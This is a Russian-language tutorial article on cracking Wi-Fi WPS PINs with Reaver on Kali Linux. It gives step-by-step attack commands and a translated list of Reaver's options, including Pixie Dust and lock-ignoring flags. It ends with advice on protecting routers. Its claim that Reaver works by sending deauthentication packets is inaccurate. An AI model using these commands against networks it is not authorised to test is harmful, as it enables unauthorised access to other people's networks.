Reaver — это бесплатный инструмент с открытым исходным кодом, который можно использовать для брута PIN-кодов WPS. Мы уже поверхностно рассказывали про этот способ в статье актуальные техники взлома WiFi. Сегодня подробно рассмотрим взлом WPS Wi-Fi с помощью Reaver.
Еще по теме: Взлом WiFi на Python
Виды атак на WPS
WPS (Wi-Fi Protected Setup) — это удобный способ подключения устройств к Wi-Fi сети, но у него есть уязвимости. Reaver эксплуатирует эти уязвимости. Он перебирает возможные PIN-коды (Personal Identification Number), которые используются для подключения устройств к Wi-Fi через WPS.
Существует два основных типа атак на WPS:
- Онлайн-атаки позволяют взломать PIN-код путем отправки запросов к точке доступа по сети.
- Оффлайн-атаки, напротив, не требуют доступа к сети и опираются на перехваченные данные рукопожатия.
Reaver работает путем отправки серии пакетов деаутентификации на целевой Wi-Fi маршрутизатор. Эти пакеты деаутентификации заставляют маршрутизатор отключить все подключенные устройства. После отключения всех устройств Reaver пытается подключиться к маршрутизатору, используя PIN-код WPS. Если PIN-код неверен, Reaver попробует ввести следующий PIN-код из списка. Этот процесс продолжается до тех пор, пока не будет найден правильный PIN-код.
Вся информация, методы и инструменты, описанные в данной статье, предназначены для образовательных целей. Использование представленной в статье информации для атак на WiFi-сети частных лиц или организации без их предварительного согласия является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши незаконные действия.
Существует также ряд автономных алгоритмов атаки на WPS. Один из наиболее распространенных — Pixie Dust. Pixie Dust работает за счет использования уязвимости в протоколе WPS, которая позволяет получить PIN-код без взаимодействия с точкой доступа. Как правило, атака проходит успешно в течение нескольких минут.
Что такое брутфорс
Брутфорс (брут или атака грубой силы) — это метод перебора всех возможных комбинаций символов до тех пор, пока не будет найдена правильная. Она может использоваться для взлома паролей, PIN-кодов и других средств защиты.
Например, если хакер хочет получить доступ к компьютерной системе, он может попытаться перебрать пароль, вводя все возможные комбинации букв, цифр и символов, пока не найдет правильную. Это может быть очень долгим процессом, но вполне действенным способом взлома Wi-Fi, если у хакера достаточно времени и ресурсов.
Брут PIN-кода WPS — это метод перебор всех возможных комбинаций из 8 цифр до тех пор, пока не будет найдена правильная. Это может быть использовано для получения доступа к сети Wi-Fi с включенной функцией WPS.
Особенности Reaver:
- Восстановление PIN-кода WPS
- Автоматизированный брутфорс
- Поддержка атак «пикси-пыль
- Расширенные опции конфигурации
- Мониторинг состояния
Установка Reaver на Linux
Reaver предустановлен в Kali Linux и других дистрибутивах безопасности Linux. Нет необходимости скачивать или устанавливать его отдельно.
Взлом WPS используя Reaver на Kali Linux
Сначала необходимо перевести адаптер в режим монитора. Для этого выполните команду:
1 |
sudo airmon-ng start wlan0 |
Как видно на изображении выше, интерфейс wlan0 теперь находится в режиме монитора с называется wlan0mon.
Теперь можно найти искать сети Wi-Fi, i отобрать те, в которых включен WPS. Для этого выполните команду.
1 |
sudo wash -i <интерфейс> |
Примечание: wlan0mon — это беспроводной интерфейс (адаптер), который сейчас работает в режиме монитора.
Команда отобразит список сетей и информацию об используемых версиях WPS если она включена.
Скопируйте BSSID точки доступа, к которую нужно взломать.
BSSID (Basic Service Set Identifier) — это уникальный идентификатор (MAC-адрес) точки доступа (Wi-Fi роутера) в беспроводной сети. Каждая точка доступа имеет свой BSSID, который ее идентифицирует.
Введите следующую команду, чтобы отобразить все параметры запуска Reaver для взлома WPS.
1 |
reaver -h |
Для взлома WPS с помощью Reaver выполните команду:
1 |
sudo reaver -i wlan0mon -b 4C:22:F3:FA:60:9D -S -v |
Где:
- -i — указывает имя используемого интерфейса.
- -b — указывает BSSID целевой сети.
- -S — указывает инструменту использовать маленькие ключи DH (Diffie-Hellman) для повышения скорости взлома.
- -v — отображает некритичные предупреждения.
Инструмент начнет перебор комбинаций для взлома WPS-пина.
Как только правильный пин будет найден, инструмент отобразит его.
Как видите, пин-код был взломан.
Параметры запуска Reaver:
1 2 3 |
Обязательные аргументы: -i, --interface=: Имя интерфейса в режиме монитора для использования. -b, --bssid=: BSSID целевой точки доступа. |
1 2 3 4 5 6 7 8 9 10 11 |
Дополнительные аргументы: -m, --mac=: MAC-адрес хост-системы. -e, --essid=: ESSID целевой точки доступа. -c, --channel=: Установить канал 802.11 для интерфейса (подразумевает -f). -s, --session=: Восстановить предыдущий сеанс из файла. -C, --exec=<command>: Выполнить указанную команду при успешном восстановлении PIN-кода.</command> <command>-f, --fixed: Отключить переход по каналам.</command> <command>-5, --5ghz: Использовать 5 ГГц 802.11 каналы.</command> <command>-v, --verbose: Отображать неважные предупреждения (-vv или -vvv для большей детализации).</command> <command>-q, --quiet: Отображать только критические сообщения.</command> <command>-h, --help: Показать справку.</command> |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
Расширенные опции: -p, --pin=: Использовать указанный пин-код WPS (может быть произвольной строкой или 4/8-значным пин-кодом WPS). -d, --delay=: Установить задержку между попытками пин-кода [1]. -l, --lock-delay=: Установить время ожидания, если точка доступа блокирует попытки пин-кода WPS [60]. -g, --max-attempts=: Завершить после num попыток пин-кода. -x, --fail-wait=: Установить время ожидания после 10 неожиданных ошибок [0]. -r, --recurring-delay=: Спать y секунд каждые x попыток пин-кода. -t, --timeout=: Установить период тайм-аута приема [10]. -T, --m57-timeout=: Установить период тайм-аута M5/M7 [0.40]. -A, --no-associate: Не ассоциироваться с точкой доступа (ассоциация должна быть выполнена другим приложением). -N, --no-nacks: Не отправлять сообщения NACK, когда принимаются пакеты не в порядке. -S, --dh-small: Использовать маленькие ключи DH для увеличения скорости взлома. -L, --ignore-locks: Игнорировать состояние блокировки, сообщаемое целевой точкой доступа. -E, --eap-terminate: Завершить каждую сессию WPS с пакетом EAP FAIL. -J, --timeout-is-nack: Считать тайм-аут как NACK (DIR-300/320). -F, --ignore-fcs: Игнорировать ошибки контрольной суммы кадра. -w, --win7: Мимикрия регистратора Windows 7 [False]. -K, --pixie-dust: Запустить атаку Pixie Dust. -Z: Запустить атаку Pixie Dust. -O, --output-file=: Записать интересующие пакеты в файл pcap. |
Защита от Reaver и атак на WPS
Чтобы защититься от Reaver, атак на WPS и в целом :
- Выключите WPS в настройках роутера и используйте более надежные методов аутентификации (например WPA2-PSK или WPA3).
- Регулярно обновляйте прошивку роутера для улучшения безопасности.
- Используйте сложные пароли для Wi-Fi сети.
- Отслеживайте подключенные устройства и обнаруживайте подозрительную активность.
Эти простые шаги помогут укрепить безопасность вашей сети.
Заключение
Вот некоторые моменты, о которых следует помнить при использовании Reaver:
- Инструмент можно использовать только против точек доступа, поддерживающих WPS.
- Reaver использует атаку брутфорс. поэтому взлом PIN-кода WPS может занять много времени.
- Тулза может быть обнаружена некоторыми роутерами, что может привести к временному отключению функции WPS.
- Использование Reaver для взлома WPS PIN-кода точки доступа является незаконным в большинстве стран.
Reaver — это отличный инструмент, который можно использовать для проверки безопасности сетей Wi-Fi.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Использование Airgeddon для взлома Wi-Fi
- Как взломать WiFi с помощью Wifite в NetHunter
- Лучшие хакерские программы для взлома со смартфона